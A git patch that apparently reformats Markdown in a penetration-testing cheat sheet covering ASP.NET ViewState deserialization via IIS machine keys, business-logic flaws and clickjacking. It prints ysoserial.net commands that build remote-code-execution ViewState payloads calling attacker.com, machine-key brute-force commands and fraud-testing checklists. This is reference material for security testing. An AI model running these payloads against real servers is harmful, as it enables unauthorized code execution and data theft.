From 9465e12b76032f65e0d6afbeb10482c0c6ab78e7 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 24 Mar 2025 16:16:58 +0100
Subject: [PATCH] Markdown Linting - API, Business Logic, Clickjacking
---
API Key Leaks/IIS-Machine-Keys.md | 43 ++++++++++++++-----------------
Business Logic Errors/README.md | 18 +++----------
Clickjacking/README.md | 32 ++++++++++-------------
3 files changed, 37 insertions(+), 56 deletions(-)
diff --git a/API Key Leaks/IIS-Machine-Keys.md b/API Key Leaks/IIS-Machine-Keys.md
index cad6573..818662a 100644
--- a/API Key Leaks/IIS-Machine-Keys.md
+++ b/API Key Leaks/IIS-Machine-Keys.md
@@ -15,7 +15,6 @@
* [Edit Cookies With The Machine Key](#edit-cookies-with-the-machine-key)
* [References](#references)
-
## Viewstate Format
ViewState in IIS is a technique used to retain the state of web controls between postbacks in ASP.NET applications. It stores data in a hidden field on the page, allowing the page to maintain user input and other state information.
@@ -29,10 +28,9 @@ ViewState in IIS is a technique used to retain the state of web controls between
By default until Sept 2014, the `enableViewStateMac` property was to set to `False`.
Usually unencrypted viewstate are starting with the string `/wEP`.
-
## Machine Key Format And Locations
-A machineKey in IIS is a configuration element in ASP.NET that specifies cryptographic keys and algorithms used for encrypting and validating data, such as view state and forms authentication tokens. It ensures consistency and security across web applications, especially in web farm environments.
+A machineKey in IIS is a configuration element in ASP.NET that specifies cryptographic keys and algorithms used for encrypting and validating data, such as view state and forms authentication tokens. It ensures consistency and security across web applications, especially in web farm environments.
The format of a machineKey is the following.
@@ -40,15 +38,15 @@ The format of a machineKey is the following.
```
-The `validationKey` attribute specifies a hexadecimal string used to validate data, ensuring it hasn't been tampered with.
+The `validationKey` attribute specifies a hexadecimal string used to validate data, ensuring it hasn't been tampered with.
-The `decryptionKey` attribute provides a hexadecimal string used to encrypt and decrypt sensitive data.
+The `decryptionKey` attribute provides a hexadecimal string used to encrypt and decrypt sensitive data.
-The `validation` attribute defines the algorithm used for data validation, with options like SHA1, MD5, 3DES, AES, and HMACSHA256, among others.
+The `validation` attribute defines the algorithm used for data validation, with options like SHA1, MD5, 3DES, AES, and HMACSHA256, among others.
The `decryption` attribute specifies the encryption algorithm, with options like Auto, DES, 3DES, and AES, or you can specify a custom algorithm using alg:algorithm_name.
-The following example of a machineKey is from Microsoft documentation (https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication).
+The following example of a machineKey is from [Microsoft documentation](https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication).
```xml
@@ -62,11 +60,10 @@ Common locations of **web.config** / **machine.config**
* 64-bits
* `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config`
* `C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config`
-* in the registry when **AutoGenerate** is enabled (extract with https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab)
+* in the registry when **AutoGenerate** is enabled (extract with [irsdl/machineKeyFinder.aspx](https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab))
* `HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4`
* `HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey`
-
## Identify Known Machine Key
Try multiple machine keys from known products, Microsoft documentation, or other part of the Internet.
@@ -115,36 +112,34 @@ List of interesting machine keys to use:
* [isclayton/viewstalker/MachineKeys2.txt](https://raw.githubusercontent.com/isclayton/viewstalker/main/MachineKeys2.txt)
* [blacklanternsecurity/badsecrets/aspnet_machinekeys.txt](https://raw.githubusercontent.com/blacklanternsecurity/badsecrets/dev/badsecrets/resources/aspnet_machinekeys.txt)
-
## Decode ViewState
* [BApp Store > ViewState Editor](https://portswigger.net/bappstore/ba17d9fb487448b48368c22cb70048dc) - ViewState Editor is an extension that allows you to view and edit the structure and contents of V1.1 and V2.0 ASP view state data.
* [0xacb/viewgen](https://github.com/0xacb/viewgen)
- ```powershell
- $ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
- ```
+ ```powershell
+ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
+ ```
## Generate ViewState For RCE
-First you need to decode the Viewstate to know if the MAC and the encryption are enabled.
+First you need to decode the Viewstate to know if the MAC and the encryption are enabled.
-**Requirements**
+**Requirements**:
* `__VIEWSTATE`
* `__VIEWSTATEGENERATOR`
-
### MAC Is Not Enabled
```ps1
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName"
```
-
### MAC Is Enabled And Encryption Is Disabled
-* Find the machine key (validationkey) using `badsecrets`, `viewstalker`, `AspDotNetWrapper.exe` or `viewgen`
+* Find the machine key (validationkey) using `badsecrets`, `viewstalker`, `AspDotNetWrapper.exe` or `viewgen`
+
```ps1
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --purpose=viewstate --valalgo=sha1 --decalgo=aes --modifier=CA0B0334 --macdecode --legacy
# --modifier = `__VIEWSTATEGENERATOR` parameter value
@@ -152,6 +147,7 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "power
```
* Then generate a ViewState using [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net), both `TextFormattingRunProperties` and `TypeConfuseDelegate` gadgets can be used.
+
```ps1
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell.exe -c nslookup http://attacker.com" --generator=3E92B2D6 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
@@ -160,29 +156,29 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "power
# --validationkey = validation key from the previous command
```
-
### MAC Is Enabled And Encryption Is Enabled
Default validation algorithm is `HMACSHA256` and the default decryption algorithm is `AES`.
-If the `__VIEWSTATEGENERATOR` is missing but the application uses .NET Framework version 4.0 or below, you can use the root of the app (e.g: `--apppath="/testaspx/"`).
+If the `__VIEWSTATEGENERATOR` is missing but the application uses .NET Framework version 4.0 or below, you can use the root of the app (e.g: `--apppath="/testaspx/"`).
* **.NET Framework < 4.5**, ASP.NET always accepts an unencrypted `__VIEWSTATE` if you remove the `__VIEWSTATEENCRYPTED` parameter from the request
+
```ps1
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\windows\temp\test.txt" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug
```
* **.NET Framework > 4.5**, the machineKey has the property: `compatibilityMode="Framework45"`
+
```ps1
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
```
-
## Edit Cookies With The Machine Key
If you have the `machineKey` but the viewstate is disabled.
-ASP.net Forms Authentication Cookies : https://github.com/liquidsec/aspnetCryptTools
+ASP.net Forms Authentication Cookies : [liquidsec/aspnetCryptTools](https://github.com/liquidsec/aspnetCryptTools)
```powershell
# decrypt cookie
@@ -192,11 +188,10 @@ $ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX
$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
```
-
## References
* [Deep Dive into .NET ViewState Deserialization and Its Exploitation - Swapneil Kumar Dash - October 22, 2019](https://swapneildash.medium.com/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili - April 23, 2019](https://soroush.me/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
* [Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net - Claranet - June 13, 2019](https://www.claranet.com/us/blog/2019-06-13-exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserialnet)
* [Project Blacklist3r - @notsosecure - November 23, 2018](https://www.notsosecure.com/project-blacklist3r/)
-* [View State, The Unpatchable IIS Forever Day Being Actively Exploited - Zeroed - July 21, 2024](https://zeroed.tech/blog/viewstate-the-unpatchable-iis-forever-day-being-actively-exploited/)
\ No newline at end of file
+* [View State, The Unpatchable IIS Forever Day Being Actively Exploited - Zeroed - July 21, 2024](https://zeroed.tech/blog/viewstate-the-unpatchable-iis-forever-day-being-actively-exploited/)
diff --git a/Business Logic Errors/README.md b/Business Logic Errors/README.md
index 6cc56fd..64a1989 100644
--- a/Business Logic Errors/README.md
+++ b/Business Logic Errors/README.md
@@ -2,7 +2,6 @@
> Business logic errors, also known as business logic flaws, are a type of application vulnerability that stems from the application's business logic, which is the part of the program that deals with real-world business rules and processes. These rules could include things like pricing models, transaction limits, or the sequences of operations that need to be followed in a multi-step process.
-
## Summary
* [Methodology](#methodology)
@@ -16,7 +15,6 @@
* [Thread Comment Testing](#thread-comment-testing)
* [References](#references)
-
## Methodology
Unlike other types of security vulnerabilities like SQL injection or cross-site scripting (XSS), business logic errors do not rely on problems in the code itself (like unfiltered user input). Instead, they take advantage of the normal, intended functionality of the application, but use it in ways that the developer did not anticipate and that have undesired consequences.
@@ -32,7 +30,6 @@ Common examples of Business Logic Errors.
* Investigate the possibility of posting reviews impersonating other users.
* Attempt Cross-Site Request Forgery (CSRF) on this feature, as it's frequently unprotected by tokens.
-
### Discount Code Feature Testing
* Try to apply the same discount code multiple times to assess if it's reusable.
@@ -41,17 +38,14 @@ Common examples of Business Logic Errors.
* Test for vulnerabilities from missing input sanitization such as XSS, SQL Injection on this feature.
* Attempt to apply discount codes to non-discounted items by manipulating the server-side request.
-
### Delivery Fee Manipulation
* Experiment with negative values for delivery charges to see if it reduces the final amount.
* Evaluate if free delivery can be activated by modifying parameters.
-
### Currency Arbitrage
* Attempt to pay in one currency, for example, USD, and request a refund in another, like EUR. The difference in conversion rates could result in a profit.
-
### Premium Feature Exploitation
@@ -60,21 +54,18 @@ Common examples of Business Logic Errors.
* Look for true/false values in requests/responses that validate premium access. Use tools like Burp's Match & Replace to alter these values for unauthorized premium access.
* Review cookies or local storage for variables validating premium access.
-
### Refund Feature Exploitation
* Purchase a product, ask for a refund, and see if the product remains accessible.
* Look for opportunities for currency arbitrage.
* Submit multiple cancellation requests for a subscription to check the possibility of multiple refunds.
-
### Cart/Wishlist Exploitation
* Test the system by adding products in negative quantities, along with other products, to balance the total.
* Try to add more of a product than is available.
* Check if a product in your wishlist or cart can be moved to another user's cart or removed from it.
-
### Thread Comment Testing
* Check if there's a limit to the number of comments on a thread.
@@ -82,10 +73,9 @@ Common examples of Business Logic Errors.
* If the system allows comments by verified or privileged users, try to mimic these parameters and see if you can comment as well.
* Attempt to post comments impersonating other users.
-
## References
-- [Business Logic Vulnerabilities - PortSwigger - 2024](https://portswigger.net/web-security/logic-flaws)
-- [Business Logic Vulnerability - OWASP - 2024](https://owasp.org/www-community/vulnerabilities/Business_logic_vulnerability)
-- [CWE-840: Business Logic Errors - CWE - March 24, 2011](https://cwe.mitre.org/data/definitions/840.html)
-- [Examples of Business Logic Vulnerabilities - PortSwigger - 2024](https://portswigger.net/web-security/logic-flaws/examples)
\ No newline at end of file
+* [Business Logic Vulnerabilities - PortSwigger - 2024](https://portswigger.net/web-security/logic-flaws)
+* [Business Logic Vulnerability - OWASP - 2024](https://owasp.org/www-community/vulnerabilities/Business_logic_vulnerability)
+* [CWE-840: Business Logic Errors - CWE - March 24, 2011](https://cwe.mitre.org/data/definitions/840.html)
+* [Examples of Business Logic Vulnerabilities - PortSwigger - 2024](https://portswigger.net/web-security/logic-flaws/examples)
diff --git a/Clickjacking/README.md b/Clickjacking/README.md
index 45c85e9..b424ac1 100644
--- a/Clickjacking/README.md
+++ b/Clickjacking/README.md
@@ -28,13 +28,12 @@
* [zaproxy/zaproxy](https://github.com/zaproxy/zaproxy)
* [machine1337/clickjack](https://github.com/machine1337/clickjack)
-
## Methodology
### UI Redressing
-UI Redressing is a Clickjacking technique where an attacker overlays a transparent UI element on top of a legitimate website or application.
-The transparent UI element contains malicious content or actions that are visually hidden from the user. By manipulating the transparency and positioning of elements,
+UI Redressing is a Clickjacking technique where an attacker overlays a transparent UI element on top of a legitimate website or application.
+The transparent UI element contains malicious content or actions that are visually hidden from the user. By manipulating the transparency and positioning of elements,
the attacker can trick the user into interacting with the hidden content, believing they are interacting with the visible interface.
* **How UI Redressing Works:**
@@ -51,8 +50,8 @@ the attacker can trick the user into interacting with the hidden content, believ
### Invisible Frames
-Invisible Frames is a Clickjacking technique where attackers use hidden iframes to trick users into interacting with content from another website unknowingly.
-These iframes are made invisible by setting their dimensions to zero (height: 0; width: 0;) and removing their borders (border: none;).
+Invisible Frames is a Clickjacking technique where attackers use hidden iframes to trick users into interacting with content from another website unknowingly.
+These iframes are made invisible by setting their dimensions to zero (height: 0; width: 0;) and removing their borders (border: none;).
The content inside these invisible frames can be malicious, such as phishing forms, malware downloads, or any other harmful actions.
* **How Invisible Frames Work:**
@@ -66,7 +65,6 @@ The content inside these invisible frames can be malicious, such as phishing for
* User Interaction: The attacker overlays enticing elements on top of the invisible iframe, making it seem like the user is interacting with the visible interface. For instance, the attacker might position a transparent button over the invisible iframe. When the user clicks the button, they are essentially clicking on the hidden content within the iframe.
* Unintended Actions: Since the user is unaware of the invisible iframe, their interactions can lead to unintended actions, such as submitting forms, clicking on malicious links, or even performing financial transactions without their consent.
-
### Button/Form Hijacking
Button/Form Hijacking is a Clickjacking technique where attackers trick users into interacting with invisible or hidden buttons/forms, leading to unintended actions on a legitimate website. By overlaying deceptive elements on top of visible buttons or forms, attackers can manipulate user interactions to perform malicious actions without the user's knowledge.
@@ -77,7 +75,7 @@ Button/Form Hijacking is a Clickjacking technique where attackers trick users in
```html
```
-
+
* Invisible Overlay: The attacker overlays this visible button or form with an invisible or transparent element that contains a malicious action, such as submitting a hidden form.
```html
@@ -119,7 +117,6 @@ Button/Form Hijacking is a Clickjacking technique where attackers trick users in
}
```
-
## Preventive Measures
### Implement X-Frame-Options Header
@@ -132,7 +129,7 @@ Header always append X-Frame-Options SAMEORIGIN
### Content Security Policy (CSP)
-Use CSP to control the sources from which content can be loaded on your website, including scripts, styles, and frames.
+Use CSP to control the sources from which content can be loaded on your website, including scripts, styles, and frames.
Define a strong CSP policy to prevent unauthorized framing and loading of external resources.
Example in HTML meta tag:
@@ -175,7 +172,7 @@ Example in HTML meta tag:
* The previous technique requires the user interaction but, the same result, can be achieved without prompting the user. To do this the attacker have to automatically cancel the incoming navigation request in an onBeforeUnload event handler by repeatedly submitting (for example every millisecond) a navigation request to a web page that responds with a _"HTTP/1.1 204 No Content"_ header.
-_204 page:_
+204 page:
```php
```
-_Attacker's Page_
+Attacker's Page:
```js